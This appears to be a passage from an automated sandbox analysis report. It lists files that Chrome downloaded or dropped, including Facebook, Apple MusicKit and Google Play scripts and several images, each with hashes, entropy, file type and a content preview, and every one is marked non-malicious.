                                                                                                                                                                                                                                  Preview:RIFF....WEBPVP8L..../?...M(l......?.#"..I.]..{J.yONIu$.....]u.d.3~...H...s.K.cf..n..v....."..."".nw..@.$Cs...k.6......@.=...`.L....-...+.F...%..7..+_.....j.g..W.e.}[.......V..<;f?%...+...../.z.L..o..y5.j..."{c(h.F.....a....B&~.&O....m..W.>{_.m.).N....N.%P.V.n.w.m.6.GD\g5zx.m.-I..X..+.1"5aN8.))..R.k...O.;.w$.m...Jm......LU.$<.?.n)....6Z.9Ex...c....jO.3.$.db...m.m.8.m...s..Qf.{......gm......'"R..,Y...bff......s.f........ff...Ar.lY......7Z.9.m].m?.r.Sg../4.e.m.f./../..m...f.]IU...8.}."....n...Ba...+...F.%..y.....!.0 ...UsS.TTB0....H......).APe...H......Z.....BM+.f...@X.Ao..it...P.Xz....*. ......,}...Qn^.Y.*..B$.J.Xv,h%.,;Y......nkA..Qa.t....L:oi4.+.. ....A~.....UKa...@A`....59.ol.7...o...32.Pz....g..O..8.."......;.KT.^....n.e.......Rm.. )b...#...3SAJ.D$.$..B4.$..........}.i...........&.....:.8..KCm.[if..X.&#i.`..f. .p..u..5...@.......$....%(!...ue.~O./..a..N.v..j.QSP.F.".6...U.R..'.I:C@Z.$.....%(r........Z.`.........\B..B .jj..........9sz:EC[
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (35297)
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):146544
                                                                                                                                                                                                                                  Entropy (8bit):5.693066609916641
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:3072:xjMLI23A/RkX4CMMMx4wySAWh/fH6i4mpsWyE96PatWf1atHp:xjMLI23A/RkJOyjiTWf1ar
                                                                                                                                                                                                                                  MD5:F919798AF73D9EDB7029150EFFED7938
                                                                                                                                                                                                                                  SHA1:4DB71EA1E3ADB27E6BF6F42CA22D51D16412D789
                                                                                                                                                                                                                                  SHA-256:116F1CAABFAB3BC63EA2134EC0377CC250CCE9F9B396E24EF2914ACDCE9B99E2
                                                                                                                                                                                                                                  SHA-512:9BD995DBC8C48F86DA95EFF7A8260EB0457F8C38ED8056C9CD9DDD4DAC8383951CDEC2095FCAA0484D470BD4DB2000589C17414413DFF30E4A801633A0169485
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  Preview:;/*FB_PKG_DELIM*/..__d("AdAppConstraintsConstants",[],(function(a,b,c,d,e,f){"use strict";a=[707152572647324..toString()];b="/apps";f.AD_APP_CONSTRAINT_VIEWER_ROLES=a;f.BASE_PATH=b}),66);.__d("AdsAPIObjectives",[],(function(a,b,c,d,e,f){e.exports={APP_INSTALLS:"APP_INSTALLS",BRAND_AWARENESS:"BRAND_AWARENESS",CANVAS_APP_ENGAGEMENT:"CANVAS_APP_ENGAGEMENT",CANVAS_APP_INSTALLS:"CANVAS_APP_INSTALLS",CONVERSIONS:"CONVERSIONS",DEPRECATED_CLICKS:"DEPRECATED_CLICKS",EVENT_RESPONSES:"EVENT_RESPONSES",EXTERNAL:"EXTERNAL",GROUP_JOINS:"GROUP_JOINS",IMPRESSIONS:"IMPRESSIONS",INCOMPATIBLE_CANVAS_APP_ENGAGEMENT:"INCOMPATIBLE_CANVAS_APP_ENGAGEMENT",INCOMPATIBLE_CANVAS_APP_INSTALLS:"INCOMPATIBLE_CANVAS_APP_INSTALLS",INCOMPATIBLE_EVENT_RESPONSES:"INCOMPATIBLE_EVENT_RESPONSES",INCOMPATIBLE_MOBILE_APP_INSTALLS:"INCOMPATIBLE_MOBILE_APP_INSTALLS",INCOMPATIBLE_OFFER_CLAIMS:"INCOMPATIBLE_OFFER_CLAIMS",INCOMPATIBLE_PAGE_ENGAGEMENT:"INCOMPATIBLE_PAGE_ENGAGEMENT",INCOMPATIBLE_PAGE_LIKES:"INCOMPATIBLE_PAGE_LIKES",
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (7012)
                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                  Size (bytes):356138
                                                                                                                                                                                                                                  Entropy (8bit):5.45076746390211
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:3072:XV3slatr7uVNns/RV+uojzv5C/BRtJV5nitT6GTC7ayZZA2lcdbZiiFxEytmt7my:V4iBojzYGteGnEKhU3C5rQ2kf
                                                                                                                                                                                                                                  MD5:E8A499F06B95FAFA1655C0560E51BE43
                                                                                                                                                                                                                                  SHA1:F2E2566A2F011BD0605A2EDE079015E3508F0DB6
                                                                                                                                                                                                                                  SHA-256:6DF0CC8AC7A1DD4A7FB2466B264224D1713151E3C319D6B0D94168D6E7CECE7D
                                                                                                                                                                                                                                  SHA-512:7F0D086033A5A991F52D2FFA04396121C41DE3A93F4AEAB2AFCDCC2E88353F56516F3261D5EE616DD258A7FF64A0F7469F0462979A5493802EA0D82F17F90698
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  URL:https://static.xx.fbcdn.net/rsrc.php/v3i6ht4/yy/l/en_GB/Td5hkdtkXX5.js
                                                                                                                                                                                                                                  Preview:;/*FB_PKG_DELIM*/..__d("ActiveFocusRegionUtilsContext",["react"],(function(a,b,c,d,e,f,g){"use strict";var h;a=h||d("react");b=a.createContext(null);c=b;g["default"]=c}),98);.__d("BaseChameleonThemeContext",["react"],(function(a,b,c,d,e,f,g){"use strict";var h;a=h||d("react");b={classNames:null};c=a.createContext(b);g["default"]=c}),98);.__d("BaseDOMContainer.react",["react","useMergeRefs"],(function(a,b,c,d,e,f,g){"use strict";var h,i=h||(h=d("react"));b=h;var j=b.useLayoutEffect,k=b.useRef;e=i.forwardRef(a);function a(a,b){var d=a.node,e=k(null);j(function(){var a=e.current;if(d!=null&&a!=null){a.appendChild(d);return function(){a.removeChild(d)}}},[d]);a=c("useMergeRefs")(b,e);return i.jsx("div",{ref:a})}a.displayName=a.name+" [from "+f.id+"]";d=i.memo(e);g["default"]=d}),98);.__d("BasePortalTargetContext",["react"],(function(a,b,c,d,e,f,g){"use strict";var h;a=h||d("react");b=a.createContext(document.body);g["default"]=b}),98);.__d("BasePortal.react",["BaseChameleonThemeContext","B
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (333)
                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                  Size (bytes):877
                                                                                                                                                                                                                                  Entropy (8bit):5.087140060597258
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:12:UXv7Fc4DpWNRKL+BK/sgl9hrIYerznR3zueIDRTLG9fkVlF38LG0DAvue1nfQOO1:u6oTTlrIYevhTuKtLG0MJQOFsCK
                                                                                                                                                                                                                                  MD5:87D2E99C717F6A11EF59AB4D56189D37
                                                                                                                                                                                                                                  SHA1:07395D5E315170A7ACFDD3C84D343182ABE98488
                                                                                                                                                                                                                                  SHA-256:7CF7F25A6FEB976FC62596722380603118B8C7572E0867D0254D071BC2B93CD8
                                                                                                                                                                                                                                  SHA-512:19233492091920B98A067943C453D1538D7844EC4DB3B489B5B72E5D41B9E9E58A1D1984679653133ED60CF7002E014530DED9B55BA62853CD8867E5936EF0AC
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  URL:https://js-cdn.music.apple.com/musickit/v2/components/musickit-components//p-a0c067db.js
                                                                                                                                                                                                                                  Preview:/*!. * IMPORTANT NOTE:. * . * This file is licensed only for the use of Apple developers in providing MusicKit Web Services,. * and is subject to the Apple Media Services Terms and Conditions and the Apple Developer Program. * License Agreement. You may not copy, modify, re-host, or create derivative works of this file or the. * accompanying Documentation, or any part thereof, including any updates, without Apple's written consent.. * . * ACKNOWLEDGEMENTS:. * https://js-cdn.music.apple.com/musickit/v1/acknowledgements.txt. */.import{c as n}from"./p-2649b6ee.js";var r=n((function(n,r){Object.defineProperty(r,"__esModule",{value:!0}),r.getLanguages=void 0,r.getLanguages=function(){if("undefined"==typeof navigator)return[];if(navigator.languages)return navigator.languages;const n=navigator.language||navigator.userLanguage;return n?[n]:[]}}));export{r as n}
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):339
                                                                                                                                                                                                                                  Entropy (8bit):5.2068287482896904
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:6:kRZzRxVvnVv6Son6AuGNG/QVIWG5hi991T2wHewQRaNw6JpyxZRNlad0:kRZTFFxQI/AIWGTi9Xl+8kbRN20
                                                                                                                                                                                                                                  MD5:6A36C5F4F0CD70C7FC5277C925B290E1
                                                                                                                                                                                                                                  SHA1:96950A3E85134A3839AAC60072F0AD9462437D16
                                                                                                                                                                                                                                  SHA-256:D854278E757E40091F0B0F888E62BB86B0CCBFBA09EBE81FEF37C0638D0602F8
                                                                                                                                                                                                                                  SHA-512:FF437A24385C11B31BD0A94A766854971787D5F33B85EBB5E38E0CEE432ADC62BDF548AF6159FAEF964F30327C6B40D5062DA473C362DACA08BE17BBD4FA81FB
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  Preview:"use strict";this.default_PlayStoreUi=this.default_PlayStoreUi||{};(function(_){var window=this;.try{._.u("LRovxc");._.qr(_.vCa,class extends _.rr{constructor(a){super(a.ta)}H(){return"LRovxc"}N(){return!0}Xa(){return _.N6}});_.$q.LRovxc=_.mB;..._.w();.}catch(e){_._DumpException(e)}.}).call(this,this.default_PlayStoreUi);.// Google Inc..
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):32158
                                                                                                                                                                                                                                  Entropy (8bit):7.992938037945725
                                                                                                                                                                                                                                  Encrypted:true
                                                                                                                                                                                                                                  SSDEEP:768:Rdcx/CagYi1InvBYlF7/L6rypHDKpxRhRgr4UY:Rdcx9Pi1InZY3/L6rWWzjRxV
                                                                                                                                                                                                                                  MD5:27A494AE47AB729D7606585B2ABD52B7
                                                                                                                                                                                                                                  SHA1:708AA4B916ACC09647E8EB1B9807F84C3EA94CAB
                                                                                                                                                                                                                                  SHA-256:593192A96FDF5A7A5ECDC181AB93083F21326F98ABA8E639C529336C4B693509
                                                                                                                                                                                                                                  SHA-512:902F63F18E6DDCA0A946EECEEB1CFC28AE6180040BF32D72145D070B873357866CBEA9D753EFF72DCEAC081BBCD20FF47F671712289E9620838505C105C81CCE
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  Preview:RIFF.}..WEBPVP8X...........'..VP8 N}..px...*..(.>m,.F$"!./6....f....X.Z;....$9'...~/.g...{S...~f......Z...k=.._.M...3...g..^o.|.....h.e}......Y.K.....W.....=.=[=.?j=9.o..|..{....._.......7.....|../../...._.....~.x..;Q..g....._.............?.._....=....G./....'.....O....5.....~._..........g.7.?.~.|..:...c..........8..............?......+.....g......f.s...A......().X/.7.J.,......3..k...r.....m...&.g..1...2.o.O;`......._R...x.Y....>Q........>1.LV..#*..b..:..~.f.k..M.......{.T...2...,0...@..~..`.z.......=.R..FtoGSd...fH..}#y..%...:.f.....u..d..|1.D_.%C..p7.d...>R..\.U...m......I..`K..GC...Zb....Q.S..S.$V;.........;...wu..Cv..H.........`.(.y.2m...Xk..N.-.1..J......@a;m.OB..42;v..:...v...n.Zf..hz.t..(zz$'^.l.j .b."...Z..}..I_<.lr.Df........|e..H.#......?.?.9..a..a.K8.1..l....1...n...h....)i.f.".B.u.>D.d.Q..C.'B../...i....1`...VN.B......)._.........wg..XbgD....4..<..a..P]....{.#..e...?....o..w..z.l..@e..{..!J....L....................D$.*...p$.K.a....F.
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (5027)
                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                  Size (bytes):5571
                                                                                                                                                                                                                                  Entropy (8bit):5.228532622874084
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:96:upnlruLefYAl+D6Y0BVNRtxz53NcecvA61tMetkp6D8y9Ow0LqDevp:8nlaVAl+eY0BVNRtxz5WecvAeK+DOwpG
                                                                                                                                                                                                                                  MD5:E3DEFF3835A17ED04C03F645B468029F
                                                                                                                                                                                                                                  SHA1:307D936EE61098FA03C08A212586EEBA143DDEA4
                                                                                                                                                                                                                                  SHA-256:F41E41D9DA866116299FBA3C99645C2066610E14AE3CD09BB0EFC49B601C4B85
                                                                                                                                                                                                                                  SHA-512:A2802FE35074FE4235B298E2A9AF6C879065F72441635D905453EAC45949DCAB77468D2B4FA77F552B931DC350975D20BD6DC7FEEF5E0BE8C3DBF828C70DD2D9
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  URL:https://js-cdn.music.apple.com/musickit/v2/components/musickit-components//p-307d936e.entry.js
                                                                                                                                                                                                                                  Preview:/*!. * IMPORTANT NOTE:. * . * This file is licensed only for the use of Apple developers in providing MusicKit Web Services,. * and is subject to the Apple Media Services Terms and Conditions and the Apple Developer Program. * License Agreement. You may not copy, modify, re-host, or create derivative works of this file or the. * accompanying Documentation, or any part thereof, including any updates, without Apple's written consent.. * . * ACKNOWLEDGEMENTS:. * https://js-cdn.music.apple.com/musickit/v1/acknowledgements.txt. */.import{r as e,e as i,h as t,H as s,c as a}from"./p-1ec6e574.js";import{H as n,g as o}from"./p-6923b857.js";import"./p-2649b6ee.js";import"./p-bb5da73d.js";import"./p-9d409825.js";import"./p-e6747c77.js";import"./p-a0c067db.js";const r={ended:"mediaEnded",error:"mediaError",pause:"mediaPause",play:"mediaPlay",playing:"mediaPlaying",volumechange:"mediaVolumeChange",fullscreenchange:"mediaFullscreenChange",webkitfullscreenchange:"mediaFullscreenChange",ms
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:PNG image data, 206 x 58, 8-bit colormap, non-interlaced
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):3841
                                                                                                                                                                                                                                  Entropy (8bit):7.55092275485853
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:96:4G+kH1Z9kSc0gh02rcTjdVX90SqLrUGc5xelk4Go5o:L+kVTkSbzM4l1Bo5o
                                                                                                                                                                                                                                  MD5:C46F54E523F2656D2F518D51623448A0
                                                                                                                                                                                                                                  SHA1:D8F8311AE18FCD2B0D9BEA85EB29A20E209518F8
                                                                                                                                                                                                                                  SHA-256:B9C604018A550B63D359608469904DE09B8EFC5F38395CCA106FAA49262DFDE0
                                                                                                                                                                                                                                  SHA-512:9EB3830D8647D31CFBB5587C5FE0C06066E95BBEB23C3C65076EEB6448EC6D42C615FC42EBA446AF054866E15FEFC7C9D205DF4846D886B0242B76FBA7E5602A
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  Preview:.PNG........IHDR.......:............PLTE...#. #. ...# $.$#. '!!@ @# $$$$ !#. (""#. +++$$$%!!UUU# !...'!!$.!$ !%.%$. ...# ## !.### !)##@@@(""# "% %&!!$ !# #$!!)))$ # !%.!333%""$ $# !$.!$ !$ !$ &""999&&&% "#. '''&!!(((#.!$ !$$$%."# "$ $.!#### !$ $.!% $ $.!$.!$!!$.!$$$# !$. %."$ !$. '''$ !#.!,!!)""$ !# $!!$ #.#+ +$ $!!$. ######+++$. $ !$!!# !&""$ $&&&+++$.!####.!$ !333$. ( (3""---# $!!'##$.!)!!$ &""# $."$""$ "'##$ $ # !$. &&&& &$ !$ $. $ "% $ $."#.!#. $. %!!$ "# !$ &""$.!$ $ %""# $ !#.!%""$ $. $!!#.!$!!$ !$$$$$$$!!$!!'''# "% "$. #!!$ !$ $ "$ !# $.!$$$# !$."$.!%!!# # #. % $. %!!+""$ $.!% "# !# %.!$.!%!!#.!$ !% #%!!&.##!!$.!$ !$ '""#.!# !&!!#.!#!!% # !$ # # !$!!#.!& ##!!% &."$$$& $ $.!$ "$ !$.$#!!$ "#!!#.!&.#$ $ "# # $ 0 0$ !$ !#.!$!!$!!#.!$ !$ "$ $.!$!!#. R.......tRNS.....1....2..&...>...'..)..P...,.-.0=.Hk....K@...C..a.!/...*R..z$.oO..d.#..Z.....%.WN.A..\.3......58...:... ...VB..~D.j[.;...."(...in.b...Eq.G<..L..S..F.U.......h.m.?......r
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                  Size (bytes):338
                                                                                                                                                                                                                                  Entropy (8bit):5.2455465103298575
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:6:kRZzRxVvn0kaoBEOAuGNG/QVIFqhi4YVnkz+MwQRaNw6JpyxZRNlad0:kRZTFIyII/AIFMi4Ye+RkbRN20
                                                                                                                                                                                                                                  MD5:0E6E4398B7CB20BD50F0F99E2AD14A06
                                                                                                                                                                                                                                  SHA1:ADB43AA77C32BA96E36FABBA57E31032C92D215D
                                                                                                                                                                                                                                  SHA-256:09965F10B79B750B0BA131AEF45AFCDF9622CD8403453338E168CE3B15855BB8
                                                                                                                                                                                                                                  SHA-512:A826EF08113464D07BA7402C5E712095B5366A2DA9E11A2A59CA2A8B98AEA144AE1630BBE52B501DD709AF46DD87265B48FDE4EDC049637D51614C1D9EBCA2F3
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  URL:"https://www.gstatic.com/_/boq-play/_/js/k=boq-play.PlayStoreUi.ru.rIMe_465lJE.2021.O/ck=boq-play.PlayStoreUi.Y1yArtXW1Kk.L.B1.O/am=R7cZwOj6QDAJDPAPHgdjAQ/d=1/exm=A1yn5d,A7fCU,ArluEf,BBI74,BVgquf,BfdUQc,EEDORb,EFQ78c,FuzVxc,GjTCAc,GkRiKb,HnDLGf,I8lFqf,IJGqxf,IZT63,IcVnM,JNoxi,KUM7Z,L1AAkb,LCkxpb,LEikZe,M2Qezd,MI6k7c,MdUzUe,Mlhmy,MpJwZc,NkwaS,NwH0H,O1Gjze,O6y8ed,OTA3Ae,OmgaI,P6sQOc,PHUIyb,PrPYRd,QIhFr,RMhBfe,RQJprf,RqjULd,SdcwHb,SpsfSb,UINLVc,UUJqVe,Uas9Hd,Ug7Xab,Ulmmrd,V3dDOb,WO9ee,XVMNvd,Z5uLle,ZDZcre,ZfAoz,ZwDk9d,_b,_tp,aW3pY,aurFic,byfTOb,chfSwc,dfkSTe,e3Zld,e5qFLc,ebZ3mb,fKUV3e,fPcQoe,gKWqec,gychg,hKSk3e,hc6Ubd,iAQMie,kJXwXb,kWgXee,kjKdXe,kpVlPe,kr6Nlf,lazG7b,lsjVmc,lwddkf,m9oV,mI3LFb,mdR7q,n73qwf,oEJvKc,ovKuLd,pCKBF,pYCIec,pjICDe,pw70Gc,q0NEmc,q0xTif,qqarmf,rpbmN,s39S4,sOXFj,soHxf,tKHFxf,uj8DUc,vrGZEc,w9hDv,wW2D8b,wg1P6b,ws9Tlc,xQtZb,xUdipf,yDVVkb,yNB6me,ywOR5c,z5Gxfe,zbML3c,zr1jrb/excm=_b,_tp,searchview/ed=1/wt=2/ujg=1/rs=AB1caFXJl0m234JZdkIlc9Y8a_1vUWHvZw/ee=EVNhjf:pw70Gc;EmZ2Bf:zr1jrb;Hs0fpd:jLUKge;JsbNhc:Xd8iUd;K5nYTd:ZDZcre;LBgRLc:SdcwHb;Me32dd:MEeYgc;NPKaK:SdcwHb;NSEoX:lazG7b;Pjplud:EEDORb;QGR0gd:Mlhmy;Rdd4dc:WXw8B;SNUn3:ZwDk9d;ScI3Yc:e7Hzgb;Uvc8o:VDovNc;YIZmRd:A1yn5d;a56pNe:JEfCwb;cEt90b:ws9Tlc;dIoSBb:SpsfSb;dowIGb:ebZ3mb;eBAeSb:zbML3c;iFQyKf:QIhFr;lOO0Vd:OTA3Ae;nAFL3:s39S4;nAu0tf:z5Gxfe;oGtAuc:sOXFj;pXdRYb:MdUzUe;qafBPd:yDVVkb;qddgKe:xQtZb;sgjhQc:bQAegc;wR5FRb:O1Gjze;xqZiqf:BBI74;yEQyxe:TLjaTd;yxTchf:KUM7Z;zxnPse:GkRiKb/m=qyd4Kb"
                                                                                                                                                                                                                                  Preview:"use strict";this.default_PlayStoreUi=this.default_PlayStoreUi||{};(function(_){var window=this;.try{._.u("qyd4Kb");._.qr(_.PBa,class extends _.rr{constructor(a){super(a.ta)}H(){return"qyd4Kb"}N(){return!0}Xa(){return _.JMc}});_.$q.qyd4Kb=_.kA;._.w();.}catch(e){_._DumpException(e)}.}).call(this,this.default_PlayStoreUi);.// Google Inc..
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                  Size (bytes):149756
                                                                                                                                                                                                                                  Entropy (8bit):7.989238660408578
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:3072:VcA3uwoHMMbvFz64XTGbnzQd3jGFqtIlL40yf15Q:VtuwosMbNz6Up3tIh2jQ
                                                                                                                                                                                                                                  MD5:E05D2BCF282C4E29A516688740FAEE8D
                                                                                                                                                                                                                                  SHA1:65820D150DABE2D37AF5DAE46197719839D080A8
                                                                                                                                                                                                                                  SHA-256:F0B676B1B1AF7B64C39271D887DC07E70F8FEAF475A7D459B6DB30F258FDA4AB
                                                                                                                                                                                                                                  SHA-512:FB7F833AC8C12FCF9873C1308994B68CE1E5AA70118B4CA545AA54531449437823E0FC93867BD0C7EF556CF6B9C8ABD47E22DCEAC188E79305D0A8BADE01B65A
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  URL:https://play-lh.googleusercontent.com/Bu3S5bBEAvad3fOA-pOpNRIOOM970zCAK8IG1anxUgfrRRbvNWICtFr19O_BHZIjlo8=w526-h296-rw
                                                                                                                                                                                                                                  Preview:RIFF.H..WEBPVP8L.H../..I.MH.d;l..G..@......$.D......:...T].t_w......{..9....ZU............}%..Zk...d.@.}....y......$%]H...Z.^.....u:)]...j..QUwGj..$2V......8......7..b........v.....W.ZIK.&~...H.V..F.6...)I..Fz$....F...I.!......}.e{.K....;czs.l.......~......o1..uB../.9g...........G.1.d;.W......hc.=......R.@.@P3YF.| ..s.....)-......,$.w...=Y........k...N.I.Z+F...\u .I.Z.I..n.0:..I@Fw7H......f.>4.R.|.|....l.$k.....|h.Ef'.t.Ww.$y.D...K..+IV.m.Z.s!.CG.... $..Iw.1j.. .Y.`$i...7.d.4.a..b...@..p....... . ].w......v...?...B..K.u...d.^..\W.....G. .$.$...V.....3.*i&.$.HI.*...wU....<d.SJ.(....9.ZS..[...|AK.$I.......g..5I.$F.8....,g.l{..m]..D.........B=.G....Q.....L..E.!.0.m.n....$.rZy..}.W...Pv.9-Z..Ap....?...~N...[..H....B..R.....a...x(.p....\......*..........#.S........E..!...............".< PB?.X...!.xK7G..........@....A:`wpp$.....P@C..\7Y...........m....n...3..O......B... .a...p.......!....?"5.+.....[.n.?\......3gn..wq......9sk...E1$U(&d,P...
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (9961)
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):49381
                                                                                                                                                                                                                                  Entropy (8bit):5.4893612792245285
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:1536:JCrcX8WlQPwSgYPxSORD9S28tltgpAS3mjyV+ElS:0rcCPwSgYPxSORD9SDipAS2zEs
                                                                                                                                                                                                                                  MD5:B0CE4498F3924CD09A1BB1C7BE14E311
                                                                                                                                                                                                                                  SHA1:D6C702D3832D75D2FA6ED0FE02AE867A15D05134
                                                                                                                                                                                                                                  SHA-256:662991BD2C2DEFEE27D0F01C27295BF675C3080E43D94AE35A5E6E50C6A48324
                                                                                                                                                                                                                                  SHA-512:30DCB09798DF3EA2E4BE593C7F8DAABE614043FA8212EC0EEFF4820CD8A01F0BE6BDDE20536FBC6D6027B9EB80BA7998235D9E9D938DC8E744C7E5FE9080B26A
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  Preview:;/*FB_PKG_DELIM*/..__d("ArtillerySegment",["invariant","cr:9985"],(function(a,b,c,d,e,f,g,h){var i=0;a=function(){function a(a){a||h(0,1496),"category"in a&&"description"in a||h(0,3138,JSON.stringify(a)),this.$1=!1,this.$2=babelHelpers["extends"]({},a,{id:(i++).toString(36)}),this.$3=[]}var c=a.prototype;c.getID=function(){return this.$2.id};c.begin=function(){this.$2.begin=b("cr:9985")();return this};c.end=function(){this.$2.end=b("cr:9985")();return this};c.appendChild=function(){var a=this;this.$1&&h(0,37302,this.$2.description);for(var b=arguments.length,c=new Array(b),d=0;d<b;d++)c[d]=arguments[d];c.forEach(function(b){a.$3.push(b.getID())});return this};c.setPosted=function(){this.$1=!0;return this};c.getPostData=function(){return babelHelpers["extends"]({},this.$2,{id:this.$2.id,children:this.$3.slice()})};return a}();g["default"]=a}),98);.__d("ArtillerySequence",["invariant"],(function(a,b,c,d,e,f,g,h){var i=0;a=function(){function a(a){a||h(0,1496),"description"in a||h(0,1497,
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (1196)
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):14806
                                                                                                                                                                                                                                  Entropy (8bit):5.525723798994031
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:384:JK0fMFukAAHhKlLpldc/HjkJ1a/qE2TqaKZl3jOledEfok:QbwHjc/DkJ1mqE2T/KZl3jOledEfok
                                                                                                                                                                                                                                  MD5:63D9155530D12A035B0F03D51565F1E6
                                                                                                                                                                                                                                  SHA1:6644793BA006E47686ED77B18A38168FE2A6B89F
                                                                                                                                                                                                                                  SHA-256:BBC6445EBE698BC85851E4C42FB977DF28E2B7A84164EDEA371E76B8550D5718
                                                                                                                                                                                                                                  SHA-512:50114A6899D1026268E610337680B0E3FD7A7F1DFC31DBD6CCE4D16953B8439D541E66B5C45F746702D5A8103C3D19DF9B22BD7F0671B66188A50B5E8DC5AA00
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  Preview:"use strict";this.default_PlayStoreUi=this.default_PlayStoreUi||{};(function(_){var window=this;.try{._.EDa=_.B("vNKqzc",[_.wk]);._.u("vNKqzc");.var $gc=class extends _.ys{static Ia(){return{service:{view:_.KK}}}constructor(a){super(a.ta);this.we=a.service.view}H(a){(a=a.event.target)&&(a=a.getAttribute("href"))&&_.IK(this.we,a)}};_.V($gc.prototype,"fAsfBd",function(){return this.H});_.Gs(_.EDa,$gc);._.w();._.yMa=_.B("JH2zc",[]);._.u("JH2zc");._.aV=class extends _.ys{constructor(a){super(a.ta);this.V=this.ma().Ub("VfPpkd-AznF2e-uDEFge-OWXEXe-GN5I5c");this.content=this.Qa("bN97Pc")}xi(a){if(this.V||!a)this.ma().yb("VfPpkd-AznF2e-uDEFge-OWXEXe-auswjd");else{const b=this.H(),c=a.width/b.width;a=a.left-b.left;this.ma().yb("VfPpkd-AznF2e-uDEFge-OWXEXe-di8rgd-RCfa3e");this.content.Cb("transform",`translateX(${a}px) scaleX(${c})`);this.H();this.ma().Ab("VfPpkd-AznF2e-uDEFge-OWXEXe-di8rgd-RCfa3e");this.ma().yb("VfPpkd-AznF2e-uDEFge-OWXEXe-auswjd");.this.content.Cb("transform","")}}H(){return t
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:PNG image data, 48 x 36, 4-bit colormap, non-interlaced
                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                  Size (bytes):185
                                                                                                                                                                                                                                  Entropy (8bit):5.9780303893393345
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:3:yionv//thPlSYLl+1IHCRsHrXLRa+dn/23rIIGU5thNnkncm3w4qtmkW7PXl0VMa:6v/lhP0YLkyymvVGtjnUnRq0kW7N0xVp
                                                                                                                                                                                                                                  MD5:07505E9DAC6DD922116F038EB58C9B88
                                                                                                                                                                                                                                  SHA1:4DAB9005E4603F76A6FAD92FE78FB9C92D05B62F
